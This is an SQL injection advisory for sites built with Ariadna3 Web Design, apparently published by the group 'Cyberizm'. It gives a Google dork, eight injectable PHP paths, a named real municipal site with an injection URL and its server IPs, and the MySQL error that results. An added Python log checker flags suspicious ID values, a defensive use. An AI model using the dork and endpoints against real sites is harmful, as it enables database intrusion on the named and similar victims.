Ariadna3 Web Design Spain SQL Injection

Author: KingSkrupellos, Published: 18-01-2019
####################################################################

# Exploit Title : Ariadna3 Web Design Spain SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 15/01/2019
# Vendor Homepage : ariadna3.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Powered by ariadna3.com''
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

####################################################################

# SQL Injection Exploit :
***********************

/THIS-PATH-CHANGES/fotografia-galerias.php?ID=[SQL Injection]

/turismo/fotografia-galerias.php?ID=[SQL Injection]

/participa/resource-visagen2.php?sc=participa&ap=actividades&ID=[SQL Injection]

/rutadeldestierro/lib/visualimg.php?IDimg=[SQL Injection]

/ayuntamiento/noticias.php?ID=[SQL Injection]

/noticias.php?ID=[SQL Injection]

/ayuntamiento/bandos.php?ID=[SQL Injection]

/bandos.php?ID=[SQL Injection]

####################################################################

# Example Vulnerable Site :
*************************

[+] aytoateca.es/turismo/fotografia-galerias.php?ID=59%27 =>

[ Proof of Concept ] => archive.is/ePNRc

Note : (46.231.127.49) => There are 267 domains hosted on this server.

Note : (46.231.127.24) => There are 293 domains hosted on this server.

####################################################################

# SQL Database Error :
**********************

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
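
Added example (not part of the original advisory and not the vendor's code): a log check for site operators that flags requests to the scripts listed above whose ID / IDimg value is not a plain decimal number once percent-decoded. The Combined Log Format, the sample lines and the assumption that legitimate ids are numeric (as in ID=59) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script name -> parameter the advisory lists as injectable.
WATCHED = {
    "fotografia-galerias.php": "ID",
    "resource-visagen2.php": "ID",
    "visualimg.php": "IDimg",
    "noticias.php": "ID",
    "bandos.php": "ID",
}

# Client address, request target and status of a Common/Combined Log Format entry.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def suspicious(line):
    """Return (client, script, param, decoded_value, status) or None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    url = urlsplit(target)
    script = url.path.rsplit("/", 1)[-1]
    param = WATCHED.get(script)
    if param is None:
        return None
    # parse_qs percent-decodes, so %27 is seen as a quote character.
    for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
        # Assumption: legitimate values are plain decimal ids, as in ID=59.
        if not re.fullmatch(r"[0-9]{1,10}", value):
            return client, script, param, value, int(status)
    return None

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Jan/2019:10:00:01 +0100] "GET /turismo/fotografia-galerias.php?ID=59 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Jan/2019:10:00:05 +0100] "GET /turismo/fotografia-galerias.php?ID=59%27 HTTP/1.1" 200 312',
    '198.51.100.7 - - [18/Jan/2019:10:00:09 +0100] "GET /rutadeldestierro/lib/visualimg.php?IDimg=12 HTTP/1.1" 200 2048',
    '203.0.113.4 - - [18/Jan/2019:10:01:00 +0100] "GET /index.php?ID=abc HTTP/1.1" 200 900',
]

def scan(lines):
    return [hit for hit in map(suspicious, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit on these scripts is a prompt to check whether the page still returns the MySQL syntax error shown above and to move the query to a prepared statement with an integer-validated id.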

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################